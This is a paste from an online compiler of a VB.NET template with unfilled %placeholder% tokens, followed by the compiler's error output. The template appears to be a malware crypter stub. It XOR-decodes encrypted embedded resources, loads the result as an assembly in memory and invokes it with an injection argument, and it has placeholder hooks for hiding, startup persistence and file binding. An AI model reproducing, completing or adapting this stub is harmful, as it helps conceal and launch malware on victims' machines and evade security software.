fork download
  1. Imports System, Microsoft.VisualBasic
  2. Imports System.Text
  3. Imports System.Runtime.InteropServices
  4. Imports System.ComponentModel
  5. Imports System.Reflection
  6. Imports System.Runtime.CompilerServices
  7. Imports System.Diagnostics
  8. Imports Microsoft.Win32
  9. Imports System.Threading
  10. Imports System.Environment
  11. Imports System.Security.Cryptography
  12.  
  13. <Assembly: AssemblyTitle("%Title%")>
  14. <Assembly: AssemblyDescription("%Description%")>
  15. <Assembly: AssemblyCompany("%Company%")>
  16. <Assembly: AssemblyProduct("%Product%")>
  17. .<Assembly: AssemblyCopyright("%Copyright%")>
  18. <Assembly: AssemblyTrademark("%Trademark%")>
  19. <Assembly: AssemblyVersion("%AssVers%")>
  20. <Assembly: AssemblyFileVersion("%FileVers%")>
  21.  
  22.  
  23. Module %111%
  24. Dim %555% As New Resources.ResourceManager("%jacksparrow%", Assembly.GetExecutingAssembly)
  25. Dim clazs As String = %555%.Getstring("%CLASSLIBRARY.CLASS1%")
  26.  
  27. Sub Main()
  28. System.Windows.Forms.Application.CurrentCulture = New Globalization.CultureInfo("en-US", False)
  29. Call FirstOne
  30.  
  31. End
  32. End Sub
  33.  
  34.  
  35.  
  36. dim %666% as string = "%PASS%"
  37.  
  38.  
  39. Sub FirstOne ()
  40. call ThirdOne
  41. End Sub
  42.  
  43.  
  44.  
  45.  
  46. Dim bcd As String = Assembly.GetExecutingAssembly().Location
  47. 'Dim ploc As String = IO.Path.GetTempPath
  48.  
  49.  
  50. Sub ThirdOne()
  51.  
  52. %hide%
  53. Dim %4% As Byte() = System.text.encoding.default.getbytes( YOtop(%3%,"%normal%"))
  54. Dim ferrarelli as String = %555%.Getstring("%ALDO%")
  55. Dim %C% As Byte() = System.Text.Encoding.Default.GetBytes(YOtop(%222%, %666%))
  56. RuntimeHelpers.GetObjectValue(Assembly.Load(%4%).GetType(clazs).GetMethod(%555%.Getstring("%DUNNING%")).Invoke(Nothing, New Object() {%C%, %inj%}))
  57. %Startup%
  58.  
  59. %Bind%
  60. End Sub
  61.  
  62. Dim %222% As string = %555%.GetString("%fedinx%")
  63. Dim %3% As string = %555%.GetString("%SI%")
  64.  
  65.  
  66. Function YOtop(ByVal Input As String, ByVal pass As String) As String
  67. Dim out As New System.Text.StringBuilder
  68. Dim u As Integer
  69. For i As Integer = 0 To Input.Length - 1 Step +2
  70. Dim tmp As String = Chr(("&H" & Input.Substring(i, 2)) Xor Asc(pass(u)))
  71. out.Append(tmp)
  72. If u = pass.Length - 1 Then u = 0 Else u = u + 1
  73. Next
  74. Return out.ToString
  75. End Function
  76. End Module
Compilation error #stdin compilation error #stdout 0s 0KB
stdin
Standard input is empty
compilation info
Visual Basic.Net Compiler version 0.0.0.5914 (Mono 2.4.2 - r)
Copyright (C) 2004-2008 Rolf Bjarne Kvinge. All rights reserved.


/home/V2uquD/prog.vb (17,2) : Error VBNC30203: Not valid as identifier.
/home/V2uquD/prog.vb (23,8) : Error VBNC30037: Symbol is not valid.
Error recovery not implemented yet.
/home/V2uquD/prog.vb (24,5) : Error VBNC30037: Symbol is not valid.
/home/V2uquD/prog.vb (25,1) : Error VBNC90019: Expected 'End'.
Error recovery not implemented yet.
/home/V2uquD/prog.vb (25,1) : Error VBNC30205: Expected end of statement.
Error recovery not implemented yet.
/home/V2uquD/prog.vb (25,1) : Error VBNC99999: vbnc crashed nearby this location in the source code.
/home/V2uquD/prog.vb (25,1) : Error VBNC99999: Unexpected error: Object reference not set to an instance of an object
  at vbnc.TypeDeclaration.Init (vbnc.Attributes CustomAttributes, Modifiers Modifiers, vbnc.MemberDeclarations Members, vbnc.Identifier Name, Int32 TypeArgumentCount) [0x00000] in /var/tmp/portage/dev-lang/mono-basic-2.4.2/work/mono-basic-2.4.2/vbnc/vbnc/source/TypeDeclarations/TypeDeclaration.vb:109 
  at vbnc.Parser.ParseModuleDeclaration (vbnc.ParsedObject Parent, vbnc.Attributes Attributes, System.String Namespace) [0x000c9] in /var/tmp/portage/dev-lang/mono-basic-2.4.2/work/mono-basic-2.4.2/vbnc/vbnc/source/Parser/Parser(Types).vb:281 
  at vbnc.Parser.ParseTypeDeclaration (vbnc.ParsedObject Parent, vbnc.Attributes Attributes, System.String Namespace) [0x000c4] in /var/tmp/portage/dev-lang/mono-basic-2.4.2/work/mono-basic-2.4.2/vbnc/vbnc/source/Parser/Parser.vb:1446 
  at vbnc.Parser.ParseAssemblyMembers (vbnc.AssemblyDeclaration Parent, System.String RootNamespace, vbnc.MemberDeclarations declarations) [0x001a8] in /var/tmp/portage/dev-lang/mono-basic-2.4.2/work/mono-basic-2.4.2/vbnc/vbnc/source/Parser/Parser.vb:1482 
  at vbnc.Parser.ParseAssemblyDeclaration (System.String RootNamespace, vbnc.AssemblyDeclaration assembly) [0x00092] in /var/tmp/portage/dev-lang/mono-basic-2.4.2/work/mono-basic-2.4.2/vbnc/vbnc/source/Parser/Parser.vb:433 
  at vbnc.Parser.Parse (System.String RootNamespace, vbnc.AssemblyDeclaration assembly) [0x00002] in /var/tmp/portage/dev-lang/mono-basic-2.4.2/work/mono-basic-2.4.2/vbnc/vbnc/source/Parser/Parser.vb:58 
  at vbnc.Compiler.Compile_Parse () [0x0006d] in /var/tmp/portage/dev-lang/mono-basic-2.4.2/work/mono-basic-2.4.2/vbnc/vbnc/source/General/Compiler.vb:363 
Compilation took 00:00:00.5830630
stdout
Standard output is empty